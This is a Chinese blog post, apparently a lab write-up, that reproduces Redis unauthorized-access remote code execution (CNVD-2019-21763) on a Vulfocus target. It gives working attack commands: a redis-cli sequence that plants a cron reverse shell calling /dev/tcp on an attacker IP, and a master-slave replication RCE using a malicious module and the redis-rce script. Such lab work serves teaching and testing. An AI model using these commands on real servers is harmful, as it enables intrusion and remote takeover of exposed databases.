VULFOCUS-redis未授权访问(CNVD-2019-21763 )

已于 2023-01-16 16:48:05 修改
阅读量2.3k 收藏 7
点赞数 5
分类专栏: 漏洞复现 文章标签: redis 数据库 nosql 安全 web安全
于 2022-11-30 16:26:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44971640/article/details/128117510
版权

文章目录

CNVD-2019-21763

描述

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。

由于在Reids 4.x及以上版本中新增了模块功能,攻击者可通过外部拓展,在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块,在未授权访问的情况下使被攻击服务器加载恶意.so 文件,从而实现远程代码执行。

攻击机:VPS
目标机器:vulfocus  redis 未授权访问 (CNVD-2019-21763)

漏洞发现

端口探测

nmap -v -Pn -p 6379 -sV 123.58.224.8 

#发现存在6379 redis服务默认端口

尝试使用 redis-cli 客户端连接

发现可以连接

写定时任务反弹shell

发现save不了,链接不稳定,尝试其他方法

redis-cli -h 123.58.224.8 -p 16632

set xxx "\n\n 1 * * * * /bin/bash -i>& /dev/tcp/10.1.1.100/4433
0>&1\n\n"

config set dir /var/

config set dbfilename root

save

主从复制RCE

如果把数据存储在单个Redis的实例中,当读写数据量比较大的时候,服务端就很难承受。为了应对这种情况,Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机,其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式。

在 Reids 4.x 之后,Redis新增了模块功能,通过外部拓展,可以实现在redis中实现一个新的Redis命令,通过写C语言并编译出 .so 文件。

手动编译 so 扩展文件

编译生成so扩展文件

git clone https://github.com/puckiestyle/RedisModules-ExecuteCommand

cd RedisModules-ExecuteCommand

make

脚本利用Redis主从复制RCE

https://github.com/puckiestyle/RedisModules-ExecuteCommand
https://github.com/Ridter/redis-rce
https://github.com/Dliv3/redis-rogue-server
https://github.com/vulhub/redis-rogue-getshell

git clone https: github.com/Ridter/redis-rce

cd redis-rce

python3 -m pip install -r requirement.txt

cp /home/ubuntu/RedisModules-ExecuteCommand/module.so ./module.so

python redis-rce.py -r 123.58.224.8 -p 58728 -L VPS ip -P vps port -f modules.so

get shell 拿到flag

渗透测试小白
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
redis 授权访问 (CNVD-2019-21763)
qq_32445755的博客
10-03 889
近日,Redis 被爆出Redis 4.x/5.x 版本存在主从同步命令执行漏洞,攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,风险较高。目前漏洞的利用方式已被公开。CNVD-2015-07557也可以复现。
Redis授权访问漏洞复现 CNVD-2019-21763 & CNVD-2015-07557
MateSnake的博客
05-17 1295
Redis授权访问漏洞复现 CNVD-2019-21763 & CNVD-2015-07557
redis漏洞修复:(CNVD-2019-21763
大新新大浩浩的博客
09-22 889
redis漏洞修复:(CNVD-2019-21763) docker形式运行的redis的防火墙规则配置
cnvd_2015_07557-redis授权访问rce漏洞复现-vulfocus复现
最新发布
c0529的博客
06-10 646
python3 redis-master.py -r 目的ip -p 目的端口 -L 47.100.167.248 -P 1111 -f RedisModulesSDK/exp.so -c "id"python3 redis-master.py -r 目的ip -p 目的端口 -L 攻击者ip -P 对应端口 -f RedisModulesSDK/exp.so -c "id"出了一个file,搜了一下是由于这个文件用python3写的,要检查一下你的服务器上是不是python版本3.0以上,用。
Redis授权访问-CNVD-2019-21763复现
XXokok的博客
11-25 344
Redis授权访问-CNVD-2019-21763复现
Redis授权访问漏洞
m0_64769218的博客
09-24 320
Redis 是非关系型数据库系统,没有库表列的逻辑结构,仅仅以键值对的方式存储数据。Redis 数据库经常用于Web 应用的缓存。Redis 可以与文件系统进行交互。Redis 监听TCP/6379。
Redis授权访问
weixin_63960760的博客
08-29 1032
redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
Another-Redis-Desktop-Manager.1.5.6
07-22
标题中的“Another-Redis-Desktop-Manager.1.5.6”指的是Another Redis Desktop Manager的1.5.6版本。这是一款专为Redis数据库设计的桌面管理工具,它提供了直观的图形用户界面(GUI),方便用户进行数据的查看、...
redis_rate:go-redis的速率限制
05-13
go-redis的速率限制 :red_heart: 该软件包基于并实现了基于Redis的速率限制的 (又名泄漏桶)。 该代码需要Redis 3.2或更高版本,因为它依赖于功能。安装redis_rate支持2个最新的Go版本,并且需要具有支持的Go版本。...
resty-redis-cluster:Redis集群的Openresty lua客户端
02-03
《深入理解resty-redis-cluster:Openresty Lua中的Redis集群客户端》 在现代Web服务开发中,数据存储和缓存扮演着至关重要的角色。Redis作为一款高性能的键值存储系统,广泛应用于缓存、消息队列等领域。而...
Another-Redis-Desktop-Manager.1.4.9.exe
09-10
免费神器,redis可视化客户端,支持5.0 stream数据结构
redis授权访问漏洞
Naive的博客
05-28 1426
Redis安装后,如果绑定在,并且没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的。
记一次对CSRF漏洞的简单分析(CNVD-2019-00135)
xy_sugar的博客
04-02 1583
漏洞详情 BageCMS是一套基于PHP和MySQL的跨平台的内容管理系统(CMS)。 BageCMS 3.1.3版本中存在跨站请求伪造漏洞。远程攻击者可借助upload/index.php?r=admini/admin/ownerUpdate URL利用该漏洞修改用户账户。 环境搭建 在phpstudy下进行的环境搭建,网站源码可自行百度BageCMS 3.1.3及以下版本应该都存在此漏洞...
修补--Redis授权访问漏洞
weixin_30342209的博客
01-09 326
--------------------------------阿里云解决方案-----------------------------------一.漏洞描述Redis因配置不当可以导致授权访问,被攻击者恶意利用。当前流行的针对Redis授权访问的一种新型攻击方式,在特定条件下,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器,可导致服...
spring-boot-starter-data-redis与spring-boot-starter-redis区别
10-13
spring-boot-starter-data-redis是Spring Data Redis的starter依赖,它提供了对Redis的支持,包括使用RedisTemplate和Spring Data Redis Repository访问Redis数据库等功能。 而spring-boot-starter-redis则是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试小白

如果您觉得满意,一分一毛也是爱

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值